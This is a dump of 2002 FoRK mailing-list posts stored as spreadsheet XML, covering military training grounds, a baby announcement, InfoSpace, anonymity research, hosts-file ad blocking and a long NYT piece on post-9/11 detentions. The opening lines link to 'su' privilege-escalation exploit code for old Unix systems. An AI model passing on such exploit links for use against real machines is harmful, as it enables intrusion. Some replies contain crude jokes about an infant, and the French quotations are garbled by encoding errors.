a million places, such as:  http://www.securiteam.com/exploits/5YP0S2035O.html  http://packetstormsecurity.nl/0101-exploits/tru-64.su.c  http://spisa.act.uji.es/spi/progs/codigo/www.hack.co.za/exploits/os/dg-ux/alpha/5a/su.c
Bye,
  Rob.
     .-.                                                               .-.
    /   \           .-.                                 .-.           /   \
   /     \         /   \       .-.     _     .-.       /   \         /     \
  /       \       /     \     /   \   / \   /   \     /     \       /       \
 /         \     /       \   /     `-'   `-'     \   /       \     /         \
            \   /         `-'                     `-'         \   /
             `-'                                               `-'
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">I think there's a link to all the details on welcomehome.org, but 
basically it was told to me this way: govt wanted land in arizona or someplace, 
indians said no, govt said 'okay, u know that land in MS u want?  we will 
fux0r it, then.'  indians still said no, govt fux0red it.
COn Wed, 31 Jul 2002, Elias Sinderson wrote:&gt; Heh. Never mind the perfectly good desert in the southwest, right? Or is 
&gt; that area too hot for desert warfare training? I'll never understand.
&gt; 
&gt; E
&gt; 
&gt; CDale wrote:
&gt; 
&gt; &gt;Okay, I'll ammend that to LIVE OLD tree saving, like the thousands of 
&gt; &gt;acres of virgin pine forest that was razed here in MS so that our military 
&gt; &gt;can practice desert warfare?  Fought it for years, lost, now there is a 
&gt; &gt;stand of trees up and down Hwy 49 that's supposed to try to hide the fact 
&gt; &gt;that a huge portion of the Desoto Ntl. Forest is gone.
&gt; &gt;
&gt; 
&gt; 
&gt; http://xent.com/mailman/listinfo/fork
&gt; -- 
"My theology, briefly, is that the universe was dictated but not
          signed."  (Christopher Morley) 
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">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book.Ive had just enough time to Gimp up a pic so folks can see the little
bloke. Head on over to http://wsmf.blogspot.com/ and have a gander at the
boy.-tom(i cant feedem so I changem)whorehttp://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">if it were me, i think i'd have a spare set of tanks in ft. irwin, and 
just move the soldiers.  
On 31 Jul 2002, James Rogers wrote:&gt; The first is logistical: Virtually all the mechanized infantry units are
&gt; located east of the Rockies, and it must be very expensive to move
&gt; entire heavy combat divisions a couple thousand miles every time they
&gt; want to run training exercises.  This is particularly true since so much
&gt; of our military is made up of reserve components these days, meaning
&gt; that you can't move the soldiers to where the training facilities are.
&gt; http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Leave it to Tom to put the one w/ his son's wanker in the center. LOL  
Reminds me of when my sister called me about the birth of her first son.  
She goes: "Cindy, he looks just like his dad, but he's HUNG!"  LOL ehehe  
Grats, Tom, he's gorgeous.  Good thing he doesn't look like you.  (:
CindyOn Thu, 1 Aug 2002, Tom wrote:&gt; 
&gt; I gota thank all you kind folk who sent thier well wishes our way. It was
&gt; a bumpy ride but everything is working out and allthe good vibes are a
&gt; tremendous help. Ive saved each one and along with the cards and other
&gt; emails we have been getting we are goign to print them out add them to
&gt; Benjamins baby book.
&gt; 
&gt; Ive had just enough time to Gimp up a pic so folks can see the little
&gt; bloke. Head on over to http://wsmf.blogspot.com/ and have a gander at the
&gt; boy.
&gt; 
&gt; -tom(i cant feedem so I changem)whore
&gt; 
&gt; 
&gt; 
&gt; http://xent.com/mailman/listinfo/fork
&gt; -- 
"My theology, briefly, is that the universe was dictated but not
          signed."  (Christopher Morley) 
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">
It took me a week to get down to this;
The towering pine and the hemlock.
http://www.informationweek.com/story/IWK20020723S0005
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;&gt;&gt;&gt;&gt; "T" == ThosStew   writes:    T&gt; ... The Mormon church has a fabulous MIS system, and since it's
    T&gt; built on geneological trackingIf that's what you would like to believe, go right ahead.    T&gt; I assume you weren't suggesting that a person's religion
    T&gt; (assuming the Mormon's ex-CIO was Mormon) should be an
    T&gt; issue. No, not at all.  I was only concerned where the border between religion 
and cult gets real fuzzy, and where the r/c in question has known
paranoiac tendencies.  Then again, maybe you're right, it's a very close match in job
descriptions.  Obviously it does not concern anyone else, and since
it's none of my business, I'll shut up about it and put it down to
more funky fun in US politics.Afterall, all I know for certain about the Mormons is the background
and fallout on my ex-wife's excommunication ;)-- 
Gary Lawrence Murphy  TeleDynamics Communications Inc
Business Innovations Through Open Source Systems: http://www.teledyn.com
"Computers are useless.  They can only give you answers."(Pablo Picasso)http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Quoth R. A. Hettinga:
&gt;The HyShot experiment - attempting the world`s first flight test of the
&gt;supersonic combustion process - was launched at 1135 local time (1205 AEST)
&gt;at the Woomera Prohibited Area, 500km north of Adelaide today.Eh?  AFAIK, the Russian Kholod program achieved successful supersonic
combustion in a scramjet about 10 years ago.Bye,
  Rob.
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Elias Sinderson wrote:
 &gt; Heh. Never mind the perfectly good desert in the southwest, right? Or is
 &gt; that area too hot for desert warfare training? I'll never understand.How hot it feels is affected by both temperature and humidity.  In 
Mississippi they have lots of humidity, in the Southwest, we don't.As I know from experience, Mississippi feels a lot hotter at 90 degrees F. 
than home (Santa Fe) does at 90.Perhaps the military didn't want to train in a real desert because 1) it 
get's over 100 degrees and any time the air temp is greater than body temp 
it affects performance, and 2) when those troops go to a real desert 
they'll think it's so much nicer than Mississippi.No, I'm not maligning Mississippi.  I had a great time passing through last 
year on vacation.Peace,Marty Halvorson
marty@halvorson.ushttp://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">
Then again, if 57% of CEOs have the time to be as up on technology as
their CIO, either one or maybe even /both/ of them are maybe not doing
their job, and maybe that's yet another reason the dot-bubble burst.Mind you, I've been head-butting with 'tech-expert' captains (and
cooks) all my life.  It's probably my own damn fault for making what I
do /look/ so easy, and also probably why 'metal guitarists grimmace so
when playing a simple rubato ;)-- 
Gary Lawrence Murphy  TeleDynamics Communications Inc
Business Innovations Through Open Source Systems: http://www.teledyn.com
"Computers are useless.  They can only give you answers."(Pablo Picasso)http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">On Thu, 1 Aug 2002, CDale wrote:--]Leave it to Tom to put the one w/ his son's wanker in the center.Heck, why hide perfection:)- No bias here, nope none whatsoever.Ill have to snap another nudie of him in a few days to show off his
bodymodification (snip snip circ circ). I even had an empty chair
present:)--tomhttp://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">From: http://www.xent.com/jan00/0823.html &gt; "There are two kinds of people in this world, right? Nonbelievers and
 &gt; believers," the animated Jain said to his audience at the Chase H&amp;Q
 &gt; plaNET.wall.street Internet conference last week. "In other words, those
 &gt; who don't believe in God, and those who believe in God and InfoSpace.
 &gt; That's OK -- the nonbelievers will be converted when we become a
 &gt; trillion-dollar company."Chalk one up for the nonbelievers:http://www.siliconvalley.com/mld/siliconvalley/3779952.htmInfoSpace CEO to step downBELLEVUE, Wash. AP) - InfoSpace Inc. chairman and chief executive Naveen 
Jain will step down from his posts once the Internet services and software 
company finds a replacement.Jain, a former Microsoft executive, founded InfoSpace six years ago and led 
the company through its rise and fall. His departure from the top posts was 
announced Wednesday.With its stock now trading for dimes, InfoSpace is in danger of being 
delisted from the Nasdaq Stock Market. The company is asking shareholders 
to approve a one-for-10 reverse stock split to prop up the price. If 
approved on Sept. 12, shareholders would trade in 10 shares of stock for 
one new share.The company has had trouble retaining its top-level executives in the past, 
including most recently, former chief executive Arun Sarin who resigned 
last year after just nine months on the job.The company said Jain will remain as a company employee.Shares of InfoSpace fell 2 cents to 43 cents in afternoon trading on Nasdaq.http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">On Thursday, August 1, 2002, at 09:59 AM, Tom wrote:&gt; On Thu, 1 Aug 2002, CDale wrote:
&gt;
&gt; --]Leave it to Tom to put the one w/ his son's wanker in the center.
&gt;
&gt; Heck, why hide perfection:)- No bias here, nope none whatsoever.That reminds me of a Robin William's routine from the 80's concerning his 
witnessing of the birth of his son (back in the day, the presence of dad 
on the OB floor was still, well, rather Marin-ish)."It's a boy, and he's hung like a bear!"
"That's the umbilical cord, Mr. Williams."-- whumphttp://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">On Thursday, August 1, 2002, at 11:38 AM, Mike Masnick wrote:&gt;  "In other words, those
&gt; &gt; who don't believe in God, and those who believe in God and InfoSpace.
&gt; &gt; That's OK -- the nonbelievers will be converted when we become a
&gt; &gt; trillion-dollar company."Verizon Wireless uses InfoSpace for myvzw.net, the last few times I 
interacted with it, I was less than impressed.If it's a example of "Argument from Design", then the Creationists ought 
to disavow Jain right away.-- whumphttp://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">http://www.therockalltimes.co.uk/2002/04/08/new-tags.htmlW3C approves HTML 4 'emotitags' - Now you'll be able to say it with
feeling
by Lester HainesThe World Wide Web Consortium (W3C) has approved a number of new html
'emotitags' which will revolutionise the web surfing experience.The tags have no physical effect, but rather elicit a strong emotional
response from the reader. Top of the list is  (War on TerrorT). The
tag, when judiciously applied, will immediately provoke violent anger
against ragheads, thus:Charity agencies report that Iraqi leader Sadaam Hussein has
adopted the African dictatorial habit of eating his political
opponents.Of particular interest to British code-monkeys is the new  (I'm
hurting too). This is designed for use when reporting on the life of
Elizabeth the Queen Mother and other recently dead famous people:She touched our lives in so many ways with her common touch and her
instinctive understanding of ordinary people. She will be sadly
missed.The instantaneous effect is to reduce the reader to teary-eyed and
self-indulgent wallowing in which he or she becomes unaccountably upset
about the death of a complete stranger.Political reporting also looks to benefit from the new  tag. Any
government ministerial pronouncement is thus rendered immediately
transparent:Tony Blair was quick to defend transport secretary Byers, calling
him "the most honest man it has been my privilege to know".And, in a much-needed boost to satire sites, W3C has formally ratified
the controversial . This guarantees any text contained within
it complete immunity from prosecution:Naomi Campbell, we can confirm, is a talentless, drug-addicted
perjurer who believes that good looks alone can justify her appalling
and obnoxious behaviour.The new tags have been warmly received by the programming community. W3C
has, however, warned that they are to be used economically. It has
further cautioned that they should never be used together, since the
effect on the reader could be catastrophic:In response to reports that the Queen Mother had fallen
victim to Sadaam Hussein's Axis of EvilT chemical weapons programme,
Stephen Byers noted: "She was everybody's favourite grandmother who
touched the lives of billions. The only consolation we can gain from
this tragedy is that all of the UK's trains will be running on time by
next Monday. And you can quote me on that."http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Damien Morton quoted:
&gt;W3C approves HTML 4 'emotitags' - Now you'll be able to say it with feeling&gt;&gt;From The Rockall Times (http://www.therockalltimes.co.uk/), definitely
the source of much funniness.
R
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">
--- begin forwarded text
Date: Sat, 3 Aug 2002 05:26:12 +0100
From: Adam Back 
To: Cypherpunks 
Cc: Adam Back 
Old-Subject: info-theoretic model of anonymity
User-Agent: Mutt/1.2.2i
Subject: info-theoretic model of anonymity
Sender: owner-cypherpunks@lne.comJust read this paper published in PET02 "Towards an Information
Theoretic Metric for Anonymity" [1]:	http://www.cl.cam.ac.uk/~gd216/set.pdf
or	http://www.cl.cam.ac.uk/~gd216/set.psit uses a Shannon like entropy model for the anonymity provided by a
system uses this model to analyse the effect of different parameters
one can tune with mixmaster (POOLSIZE, RATE, in mixmaster.conf).The "anonymity entropy" measurement can be interpreted as how many
bits of information the attacker needs to identify a user and is
computed from probabilities.Would be interesting to try estimate the entropy provided by the
current mixmaster network.  A number of nodes publish their parameter
choices, and traffic volume over time (in hourly increments).Adam
--
http://www.cypherspace.org/adam/[1]@inproceedings{Serjantov:02:info-theoretic-anon,
  author = "Andrei Serjantov and George Danezis",
  title = "Towards an Information Theoretic Metric for Anonymity",
  booktitle = "Proceedings of the Workshop on Privacy Enhancing Technologies",
  year = "2002",
  note = "Also available as
\url{http://www.cl.cam.ac.uk/~aas23/papers_aas/set.ps}"
}---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</si>
  <si>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(pace Giraudoux)To be more precise, I believe that there will be no "war of civilizations"
between the Western and the Muslim, and not because of drum-beating or
war-mongering from some parts, but due to stuff like this:  http://www.lemonde.fr/article/0,5987,3210--286553-,00.html&gt;L'assemblï¿½e nationale turque a rï¿½alisï¿½ l'impossible : pour satisfaire
&gt;aux demandes de l'Union europï¿½enne, le Parlement, lors d'une session
&gt;qui a durï¿½ plus de seize heures, a, aboli la peine de mort (sauf en
&gt;cas de guerre), ï¿½liminï¿½ les obstacles lï¿½gaux ï¿½ l'ï¿½ducation et ï¿½ la
&gt;diffusion en langue kurde, levï¿½ certaines restrictions rendant
&gt;l'organisation de manifestations difficile et mis fin ï¿½ l'imposition
&gt;de peines pour critiques envers l'armï¿½e ou d'autres institutions ï¿½tatiques.i.e., &gt;The Turkish National Assembly achieved the impossible: to satisfy
&gt;European Union demands, the Parlement, during a session lasting more
&gt;than sixteen hours, abolished the death penalty (except in war time),
&gt;eliminated legal obstacles to teaching and spreading of the Kurdish
&gt;language, lifted certain restrictions making it difficult to organise
&gt;protest marches and ended penalties imposed for criticism of the army
&gt;and other state institutions.
This is the way forward, IMO.  Just wait a couple of years until
66 million Muslim Turks are making great strides towards democracy
and prosperity in the E.U. and Syria, Lebanon etc start lining up and
making similar decisions.Of course there are hard-liners who would be right at home on
Rumsfeld's staff, but they got out-voted:&gt;La peine de mort s'est rï¿½vï¿½lï¿½e le sujet le plus ï¿½pineux : les
&gt;ultra-nationalistes ï¿½taient dï¿½terminï¿½s ï¿½ obtenir la pendaison du
&gt;dirigeant du PKK (kurde), Abdullah ï¿½calan, considï¿½rï¿½ par les Turcs
&gt;comme personnellement responsable de la mort de plus de 30 000
&gt;personnes.  ï¿½calan avait ï¿½tï¿½ condamnï¿½ ï¿½ mort en juin 1999, mais le
&gt;gouvernement avait acceptï¿½ d'attendre le verdict de la Cour europï¿½enne
&gt;des droits de l'homme avant de l'exï¿½cuter.  De nombreux nationalistes
&gt;estimaient ï¿½galement que l'octroi de droits culturels aux Kurdes
&gt;reprï¿½senterait une concession aux revendications des "terroristes".i.e.,&gt;The death penalty turned out to be the thorniest issue: the
&gt;ultra-nationalists were determined to secure the hanging of the PKK
&gt;leader, Abdullah ï¿½calan, considered by the Turks to be personally
&gt;responsible for the deaths of more than 30,000 people.  ï¿½calan had
&gt;been condemned to death in June 1999, but the government had accepted
&gt;to wait for the verdict of the European Court of Human Rights before
&gt;executing him.  Many nationalists also believed that handing cultural
&gt;rights to the Kurds would constitute a concession to "terrorist"
&gt;demands.
Over 'n out,
  Rob.
     .-.                                                               .-.
    /   \           .-.                                 .-.           /   \
   /     \         /   \       .-.     _     .-.       /   \         /     \
  /       \       /     \     /   \   / \   /   \     /     \       /       \
 /         \     /       \   /     `-'   `-'     \   /       \     /         \
            \   /         `-'                     `-'         \   /
             `-'                                               `-'
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">So how did I miss, and how come I can't find, the fork post
that explains the lyrics to Brimful of Asha?I first heard of the song while reading
http://www.ottawa-anime.org/~eyevocal/beingupfront/
but I had never heard it until I downloaded it among
a bunch of other Fatboy Slim mixes.- Joe
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Don't know if everybody knows this trick...Puts 127.0.0.1 as the IP for adservers. Elegant.==http://technoerotica.net/mylog/hostfile.htmlAs mentioned throughout this site, there is more than one way to skin a cat
when it comes to pop-ups. The hosts file is one of the most effective
methods there is. In brief, a hosts file is a text file used by Windows to
resolve domain names and IP addresses. If you're running windows, you
already have a hosts file but it most likely isn't being used.What a hosts file does is simple, it lists domains and IP numbers. To get
rid of ads, the hosts file lists the domain names of adservers along with
the IP number 127.0.0.1. This tells windows to grab any content from the
listed domain from the specified IP number. The specified IP number in this
case is your own computer. What happens is that it won't display the ad. If
you choose this method of ad removal there is no need to use our opt out
links. The hosts file is a very effective mechanism.You can download this hosts file, unzip it and place it in your Windows
directory. YOU SHOULD MAKE A BACK UP of your existing hosts file before you
do. The hosts file is called "hosts" there is no extension. You may have a
file named Hosts.sam this is merely a sample hosts file.Once you download the file and put it in the windows folder, reboot your
computer and it's a done deal. Pretty simple huh? You might want to look at
the contents of this file as it contains additional information as well as
an address for getting updated versions. Because we're inherently lazy, this works for windows only, don't use it on
a mac! Follow the address in the hosts file for alternative system
instructions.
download now 
We didn't write this file and do not provide support for it's use. Follow
the address in the hosts file for questions. It's not that we don't want to
hear from you but the folks at this address have the answers you need.http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">
Wow, what a flash, I just got the _perfect_ idea for a new
suspense/crime TV drama: Every week, some poor schmuck answers 
one of these Nigerian Scams ...-- 
Gary Lawrence Murphy  TeleDynamics Communications Inc
Business Innovations Through Open Source Systems: http://www.teledyn.com
"Computers are useless.  They can only give you answers."(Pablo Picasso)http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Okay okay... after reading further I realized this wasn't all that great....
thanks for the feedback anyway.----- Original Message -----
From: "Joseph S. Barrera III" 
To: "Mr. FoRK" 
Cc: 
Sent: Saturday, August 03, 2002 10:31 PM
Subject: Re: Using hosts file to rid yourself of popup ads
&gt; Mr. FoRK wrote:
&gt; &gt; Don't know if everybody knows this trick...
&gt;
&gt; Yes. They do.
&gt;
&gt; &gt; &gt; Because we're inherently lazy, this works for windows only,
&gt;
&gt; Huh? Oh, that's right, Unix picked up the idea of /etc/hosts
&gt; from Windows. I keep forgetting.
&gt;
&gt;  &gt; &gt; don't use it on a mac!
&gt;
&gt; Especially macs running unix (see above).
&gt;
&gt; &gt; &gt; We didn't write this file and do not provide
&gt;  &gt; &gt; support for it's use.
&gt;
&gt; We don't even know how to use the fucking English language.
&gt; --
&gt; What security level comes after "Totally Apeshit"?
&gt;      -- http://www.mnftiu.cc/mnftiu.cc/war12.html
&gt;
&gt;
&gt; http://xent.com/mailman/listinfo/fork
&gt;
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">. . . or eventuality: Bush and Cheney fuck each other when the rest of the nation suddenly becomes unavailable.http://www.hfcletter.com/letter/August02/gg
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">If anyone can get past the "No Cookie" monster to the actual text of this
link, let me know. :-).Cheers,
RAH
At 5:36 AM -0600 on 8/5/02, GigaLaw.com wrote:
&gt; Jury Rules for Defense in $700 Million Net Defamation Case
&gt;      In one of the first trials in the nation to address Internet
&gt; defamation, a Dallas County, Texas, jury rejected a $700 million suit by
&gt; an Internet company that claimed it was harmed by negative electronic
&gt; messages. Dallas' ZixIt alleged that Paul Guthrie, formerly a vice
&gt; president with Visa, posted more than 400 anonymous messages, many
&gt; negative, about ZixIt on a Yahoo Internet message board, causing ZixIt's
&gt; stock price to drop.
&gt;      Read the article: law.com @
&gt;
&gt;http://www.law.com/servlet/ContentServer?pagename=OpenMarket/Xcelerate/View&amp;c=LawArticle&amp;cid=1028320303259&amp;t=LawArticleTech--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</si>
  <si>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This article from NYTimes.com 
has been sent to you by luke@applix.com.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American-style justice.The default explanation for government secrecy is to conceal official wrongdoing.  The administration is here making the case that Americans don't even have a right to question government secrecy.We may find that the history of this past year has been an epic looting from the public, made possible by the urgency of reacting to 9/11.
luke@applix.com
After Sept. 11, a Legal Battle Over Limits of Civil LibertyAugust 4, 2002
By THE NEW YORK TIMES 
 This article was reported and written by Adam Liptak, Neil
A. Lewis and Benjamin Weiser. In the fearful aftermath of Sept. 11,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1,200 people suspected of violating
immigration laws, being material witnesses to terrorism or
fighting for the enemy. The government's effort has produced few if any law
enforcement coups. Most of the detainees have since been
released or deported, with fewer than 200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government's record has so far been decidedly mixed. As
it has pushed civil liberties protections to their limits,
the courts, particularly at the trial level, have pushed
back, stopping well short of endorsing Mr. Ashcroft's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challenges into an attack on
what they call unconstitutional preventive detentions. People brought in and jailed as material witnesses, those
thought to have information about terrorist plots, have
argued that they should not be held to give testimony in
grand jury investigations. Finally, Yasser Esam Hamdi and Jose Padilla, the two
Americans labeled "enemy combatants" for what the
government contends is more direct involvement with
terrorist groups, are seeking rights once thought to be
fundamental to American citizens, like a lawyer's
representation and a chance to challenge their detentions
before a civilian judge. So far, federal judges in Newark and Detroit have ordered
secret deportation proceedings opened to public scrutiny,
and on Friday a federal district judge in Washington
ordered that the identities of most of the detainees be
made public under the Freedom of Information Act. "Secret arrests," Judge Gladys Kessler wrote in the
decision on Friday, "are a concept odious to a democratic
society." A senior Justice Department official said the detentions
had been lawful and effective. He said it was hard to
"prove a negative" and cite specific terrorist acts that
had been disrupted. But he said that department officials
believed that the detentions had "incapacitated and
disrupted some ongoing terrorist plans." Two federal judges in New York have differed sharply on
whether the government may jail material witnesses while
they wait to testify in grand jury investigations. In
Virginia, a federal judge ordered the government to allow
Mr. Hamdi to consult a lawyer. "I look at the federal district court judges and just cheer
them on, because they are doing exactly what an independent
judiciary should be doing," said Jane E. Kirtley, a
professor at the University of Minnesota and former
executive director for the Reporters Committee for Freedom
of the Press. "It's not hostile or adversarial; it's simply
skeptical." These lower-court decisions have for the most part not yet
been tested on appeal, and there is reason to think that
appeals courts and the Supreme Court will prove more
sympathetic to the government's tactics and arguments. The federal appeals court in Richmond, Va., for instance,
reversed the decision to allow Mr. Hamdi to talk to a
lawyer and ordered the lower court judge to consider
additional evidence and arguments. But even the appeals court seemed torn, and it rejected the
government's sweeping argument that the courts have no role
in reviewing the government's designation of an American
citizen as an enemy combatant. The detention issues also carry an emotional punch. Many of
the Arabs and Muslims caught in the government dragnet were
cabdrivers, construction workers or other types of
laborers, and some spent up to seven months in jail before
being cleared of terrorism ties and deported or released. Last month, at a conference held by a federal appeals
court, Warren Christopher, the secretary of state in the
Clinton administration, snapped at Viet Dinh, an assistant
attorney general under President Bush, saying that the
administration's refusal to identify the people it had
detained reminded him of the "disappeareds" in Argentina. "I'll never forget going to Argentina and seeing the
mothers marching in the streets asking for the names of
those being held by the government," Mr. Christopher said.
"We must be very careful in this country about taking
people into custody without revealing their names." Mr. Dinh, who came to the United States as a refugee from
Vietnam, recalled his family's anguish when his father was
taken away in 1975 for "re-education." In contrast, he
said, those detained by the United States were not being
secretly held but were allowed to go to the press and seek
lawyers. "These are not incognito detentions," he said. "The only
thing we will not do is provide a road map for the
investigations." According to the Justice Department, 752 of the more than
1,200 people detained since Sept. 11 were held on
immigration charges. Officials said recently that 81
remained in detention. Court papers indicate there were
about two dozen material witnesses, while most of the other
detainees were held on various state and federal criminal
charges. President Bush also has announced plans to try suspected
foreign terrorists before military tribunals, though no
such charges have been brought yet. Last month, William G. Young, the federal judge presiding
in Boston over the criminal case against Richard C. Reid, a
British citizen accused of trying to detonate a bomb in his
shoe on a trans-Atlantic flight, noted that the very
establishment of those tribunals "has the effect of
diminishing the American jury, once the central feature of
American justice." Judge Young, who was appointed by President Ronald Reagan,
added: "This is the most profound shift in our legal
institutions in my lifetime and - most remarkable of all -
it has taken place without engaging any broad public
interest whatsoever." Jack Goldsmith and Cass R. Sunstein, professors at the
University of Chicago Law School, have written that the
Bush administration's policies are a minimal challenge to
civil liberties especially compared with changes during the
times of Abraham Lincoln and Franklin D. Roosevelt. What
has changed, they say, is a greater sensitivity to civil
liberties and a vast increase in mistrust of government. The Secrecy U.S. Says Hearings 
Are Not Trials Ten days
after last September's attacks, Michael J. Creppy, the
nation's chief immigration judge, quietly issued sweeping
instructions to hundreds of judges for what would turn out
to be more than 600 "special interest" immigration cases. "Each of these cases is to be heard separately from all
other cases on the docket," Judge Creppy wrote. "The
courtroom must be closed for these cases - no visitors, no
family, and no press." "This restriction," he continued, "includes confirming or
denying whether such a case is on the docket." The government has never formally explained how it decided
which visa violators would be singled out for this
extraordinary process, and it has insisted that the
designations could not be reviewed by the courts. But as it turns out, most of these cases involved Arab and
Muslim men who were detained in fairly haphazard ways, for
example at traffic stops or through tips from suspicious
neighbors. Law enforcement officials have acknowledged that
only a few of these detainees had any significant
information about possible terrorists. As the ruling on Friday in Washington suggests, a series of
legal challenges to this secrecy has resulted in striking
legal setbacks for the administration. Several courts have
ordered the proceedings opened and have voiced considerable
skepticism about the government's justifications for its
detention policies generally. Lee Gelernt, a lawyer at the American Civil Liberties
Union, said the secrecy of the proceedings exacerbated the
hardships faced by people who disappeared from sight on
violations that in the past would not have resulted in
incarceration. "Preventive detention," he said, "is such a radical
departure from constitutional traditions that we certainly
shouldn't be undertaking it solely on the Justice
Department's say-so." Malek Zeidan's detention would have been unexceptional had
it not given rise to one of the legal challenges that
threatens to end the secret proceedings. Mr. Zeidan, 42, is a Syrian citizen who overstayed his visa
14 years ago and has lived in Paterson, N.J., for more than
a decade. Over the years, he has delivered pizzas, driven
an ice cream truck and pumped gas. When the Immigration and
Naturalization Service came around last Jan. 31 to ask him
about a former roommate suspected of marriage fraud, Mr.
Zeidan was working at Dunkin' Donuts, and his expired visa
soon cost him 40 days in custody. When a hearing was finally held three weeks after his
detention, the judge closed the courtroom, excluding Mr.
Zeidan's cousin and reporters. The closing of proceedings prompted lawsuits in federal
court, from both Mr. Zeidan and two New Jersey newspapers.
In March, the government dropped the "special interest"
designation, Mr. Zeiden was released after posting a bond,
and the case he filed was dismissed. The immigration
charges against him will be considered in the fall. "You're one of the lucky ones," his lawyer, Regis
Fernandez, recalls telling Mr. Zeidan, given that other
visa violators were held as long as six or seven months
before being deported or released. Mr. Zeidan's lawyers believe that their legal strategy,
which focused on openness, forced the government's hand. "The government was somehow linking secrecy to guilt," Mr.
Fernandez said. "We figured if the public had access to
these hearings they would see that nothing went on except
multiple adjournments and delay." Through a spokeswoman, Judge Creppy declined to comment. An
I.N.S. official, who spoke on the condition that he not be
named, said the agency had acted properly in Mr. Zeidan's
case and in similar cases. He said the immigration service had always detained people
without bond who were linked to criminal investigations. He
added that the agency had no choice now but to detain a
visa violator until the Federal Bureau of Investigation was
sure the person was not involved in terrorism. "Consider the flip side - that you held him for two days
and then deported him, and 30 days later you found out he
was a terrorist," the official said. The newspapers' lawsuit has continued. It has already once
reached the Supreme Court, and the government's papers
contain one of the fullest accounts of its position on
secrecy and executive power. Its main argument is that the courts have no role because
immigration hearings are not really trials, but are merely
administrative hearings that can be closed at will. Bennet Zurofsky, who also represented Mr. Zeidan, said he
was flabbergasted by this suggestion. "A trial is a trial," he said. "A person's liberty is at
stake. A person is being held in jail. A person is being
told where to live." But in a sworn statement submitted in several court cases,
Dale L. Watson, the executive assistant director for
counterterrorism and counterintelligence at the F.B.I.,
outlined the reasoning behind the government demand for
total secrecy. "Bits and pieces of information that may appear innocuous
in isolation can be fit into a bigger picture by terrorist
groups," he said. This rationale for withholding information, sometimes
called the mosaic theory, is controversial. "It's impossible to refute," Professor Kirtley said,
"because who can say with certainty that it's not true?" In May, John W. Bissell, the chief judge of the federal
district court in Newark, appointed by President Reagan,
ruled for the newspapers and ordered all deportation
hearings nationwide to be opened, unless the government is
able to show a need for a closed hearing on a case-by-case
basis. His ruling followed a similar one in Detroit the
month before, though that case involved only a single
detainee. The government appealed to the Court of Appeals for the
Third Circuit, in Philadelphia, and asked it to block Judge
Bissell's order until the appeal was decided. The court,
which will hear arguments in September, declined to do
that. A number of news organizations, including The New
York Times, filed a brief as a friend of the court in
support of the newspapers. The government then asked the United States Supreme Court
to stay Judge Bissell's order. The court, in a relatively
unusual move given that the case was not before it for any
other purpose, blocked Judge Bissell's order, suggesting
that it might have more sympathy for the government's
arguments. The Witnesses Rights Violated, 
Lawyers Contend Late on Sept. 12, federal agents pulled
two nervous Indian men, Mohammed Jaweed Azmath and Syed Gul
Mohammed Shah, off an Amtrak train near Fort Worth. They
were carrying box cutters, black hair dye and about $5,000
in cash and had also shaved their body hair. The agents' suspicions were obvious. The hijackers had used
box cutters and knives to take control of the aircraft and
had received letters instructing them to "shave excess hair
from the body." An F.B.I. affidavit dated Sept. 15 said
there was probable cause to believe that both of the Indian
men were involved in, or "were associated" with, those
responsible for the Sept. 11 attacks. But even though government officials told reporters that
the men had been detained as material witnesses, their
lawyers now say that they were held last fall only on
immigration violations. The distinction is important because a material witness
warrant brings the automatic appointment of a
government-paid lawyer, while the government does not have
to supply a visa violator with counsel. As a result, the authorities were able to question each of
the men repeatedly about terrorism without a lawyer
present, their current lawyers say. Like some of the people who were picked up as material
witnesses, the Indian men were held in isolation in jails
in New York for extended periods. It was 91 days before Mr.
Azmath received a lawyer and 57 days before Mr. Shah did,
their lawyers say. "It's wrong to keep a man in jail for 57 days and never
bring him before a magistrate to advise him of his rights,"
Mr. Shah's lawyer, Lawrence K. Feitell, said in an
interview. "It's wrong not to provide him with an attorney
at the threshold. It's wrong to depict this as an I.N.S.
investigation, when in truth and in fact, it's the main
inquiry into the World Trade Center debacle." Anthony L. Ricco, the lawyer for Mr. Azmath, said his
client was interrogated "often times for several hours a
day, with multiple interviewers, getting rapid-fire
questions from three or four different people." Eventually, the F.B.I. and the prosecutors cleared the men
of any involvement in terrorism, and both pleaded guilty in
June in a credit-card fraud scheme and are awaiting
sentencing. Federal prosecutors said in court papers that both men
consented to questioning. Each "was read and waived his
Miranda rights before each interview," prosecutors wrote,
adding that each man confessed to the credit card offenses.
The United States attorney in Manhattan, James B. Comey,
would not comment on the specific cases, but said generally
of the government's tactics: "I don't see any violation of
any rule, regulation, or law. "I can understand defense lawyers not being happy," he
said. "But I know our position after 9/11 was to use every
available tool, to stay within the rules but play the whole
field and recognize the boundaries, but cover the whole
field. "We need to do whatever we can that's legal to investigate
and disrupt," he added. Today, it is believed that only a handful of the two dozen
